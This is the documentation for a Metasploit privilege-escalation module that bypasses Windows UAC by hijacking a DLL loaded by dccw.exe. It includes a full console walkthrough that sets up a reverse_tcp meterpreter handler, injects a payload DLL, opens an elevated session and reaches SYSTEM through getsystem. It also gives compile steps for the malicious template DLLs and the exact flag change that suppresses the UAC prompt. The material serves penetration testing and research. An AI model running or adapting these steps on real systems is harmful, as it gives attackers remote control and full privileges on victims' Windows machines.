## Vulnerable Application

This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on, and supports, both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any version of Windows 7.

No installation is required; the module works on stock Windows releases.

### Running Example
```
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set LHOST <MSF_IP>
LHOST => <MSF_IP>
>  set LPORT 30009
LPORT => 30009
>  show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     30009            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


> run -z
[*] Started reverse TCP handler on <MSF_IP>:30009 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:30009 -> <Win10x86_IP>:50041) at 2017-10-03 12:17:42 -0700
[*] Session 1 created in the background.
> sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (<Win10x86_IP>)
Computer        : WIN10X86-1511
OS              : Windows 10 (Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
> sessions -C ifconfig
[*] Running 'ifconfig' on meterpreter session 1 (<Win10x86_IP>)

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  2
============
Name         : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : 2001:0:4137:9e76:38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::38b8:1e49:3f57:795f
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:73:25:67
MTU          : 1500
IPv4 Address : <Win10x86_IP>
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cc97:6548:c10a:f034
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  6
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:86a0
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

> sessions -l

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  1   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)

> use exploit/windows/local/bypassuac_injection_winsxs
> set session 1
session => 1
> set target 0
target => 0
> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
> set lhost <MSF_IP>
lhost => <MSF_IP>
> set lport 30010
lport => 30010
> set verbose true
verbose => true
> show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     30010            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


> run -j
[*] Exploit running as background job.
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (13 bytes)
[*] Started reverse TCP handler on <MSF_IP>:30010 
[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/windows-meterpreter-reverse_tcp-192x168x134x160-30009.rc)> Ruby Code (12 bytes)
[+] Windows 10 (Build 10586). may be vulnerable.
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 18944 bytes long being uploaded...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting  into process ID 3476
[*] Opening process 3476
[*] Injecting struct into 3476
[*] Executing payload
[+] Successfully injected payload in to process: 3476
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:30010 -> <Win10x86_IP>:50078) at 2017-10-03 12:19:03 -0700
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the path specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[-] Error => Rex::Post::Meterpreter::RequestError - stdapi_fs_stat: Operation failed: The system cannot find the file specified.
[+] All the dropped elements have been successfully removed
> sessions -l

Active sessions
===============

  Id  Type                     Information                            Connection
  --  ----                     -----------                            ----------
  1   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  <MSF_IP>:30009 -> <Win10x86_IP>:50041 (<Win10x86_IP>)
  2   meterpreter x86/windows  WIN10X86-1511\msfuser @ WIN10X86-1511  <MSF_IP>:30010 -> <Win10x86_IP>:50078 (<Win10x86_IP>)

> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
> sessions -C getsystem
[*] Running 'getsystem' on meterpreter session 1 (<Win10x86_IP>)
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[*] Running 'getsystem' on meterpreter session 2 (<Win10x86_IP>)
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
> sessions -C getuid
[*] Running 'getuid' on meterpreter session 1 (<Win10x86_IP>)
Server username: WIN10X86-1511\msfuser
[*] Running 'getuid' on meterpreter session 2 (<Win10x86_IP>)
Server username: NT AUTHORITY\SYSTEM
> exit -y
```

## Compiling Instructions
### Compiling Template DLLs
To build the x86 template DLL, use `data/templates/src/pe/dll_gdiplus/build.sh` (requires the mingw-w64 package from apt):
```
cd data/templates/src/pe/dll_gdiplus
./build.sh
cp data/templates/src/pe/dll_gdiplus/template_x86_windows.dll data/templates/template_x86_windows_dccw_gdiplus.dll
```
To build the x64 binary (in an x64 VS2013 command prompt):
```
Z:\metasploit-framework\data\templates\src\pe\dll_gdiplus>cl.exe -LD template.c /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain "kernel32.lib"
cp data/templates/src/pe/dll_gdiplus/template.dll data/templates/template_x64_windows_dccw_gdiplus.dll
```

### Compiling bypassuac-x86.dll and bypassuac-x64.dll
Open the Visual Studio solution located in
`metasploit-framework/external/source/exploits/bypassuac_injection/`.
Choose `Release` from the solution configurations and build both the x86 and x64 configurations. The resulting binaries should already be written to the right place.

# More information
(From PR)

I decided to create a different module rather than update the one called "bypassuac_injection", because in order to
perform a DLL hijacking I need to create several folders in which to insert our malicious DLL. Also, I deleted these
files and folders in a different way, instead of using the method "register_file_for_cleanup()", so as to be able to
remove the created folders and also prevent a very large output.

If you want to understand the module in more depth, I recommend visiting the C++ project on my GitHub:
https://github.com/L3cr0f/DccwBypassUAC

## **DLL INJECTION**
**/metasploit-framework/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp
/metasploit-framework/data/post/bypassuac-x64.dll
/metasploit-framework/data/post/bypassuac-x86.dll**

To perform the DLL hijacking we need to copy the file of our interest to a specific location (in our case "C:\Windows\System32\") using IFileOperation. To do so, we first need to inject a DLL that will perform this task. This DLL is almost the same as the one used in the "bypassuac_injection" module, but on the latest Windows 10 systems (build 15003 or greater) IFileOperation must be invoked in a different way so as not to trigger the UAC prompt. The modification is:

`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`

to

`if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)`

Note that this modification does not affect other modules.
To conclude this section, I didn't find the code of "/metasploit-framework/data/post/bypassuac-[ARCH].exe", so I could not update it.

## **DLL HIJACKING**
**/metasploit-framework/data/templates/template_x86_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/template_x64_windows_dccw_gdiplus.dll
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.c
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.h
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.def
/metasploit-framework/data/templates/src/pe/dll_gdiplus/template.rc
/metasploit-framework/data/templates/src/pe/dll_gdiplus/build.sh
/metasploit-framework/lib/msf/core/exploit/exe.rb
/metasploit-framework/lib/msf/util/exe.rb**

To execute code at high integrity we need to perform a DLL hijacking, but we cannot use the DLL templates provided by
Metasploit since we need to forward some functions to the legitimate DLL, so we need to create a new pair of DLL templates,
which are exactly the same but include the forwarding feature (the way I have implemented it does not work on Windows 7).
Now, despite working successfully, I think it would be great to include this forwarding feature on the fly, I mean,
without having to create an additional DLL template. I don't know how this can be done, so if you come up with something,
let me know.

Also, to load the DLL template described above, we have modified the "exe.rb" files listed above.

## **Set up the vulnerable environment**

The vulnerable environment setup is the same as for the "bypassuac_injection" module: we need a meterpreter session, select
the architecture (0 for x86 and 1 for x64), select the meterpreter payload based on the architecture we want to execute
with high integrity, and set the regular parameters of the payload (LHOST, LPORT, etc.).
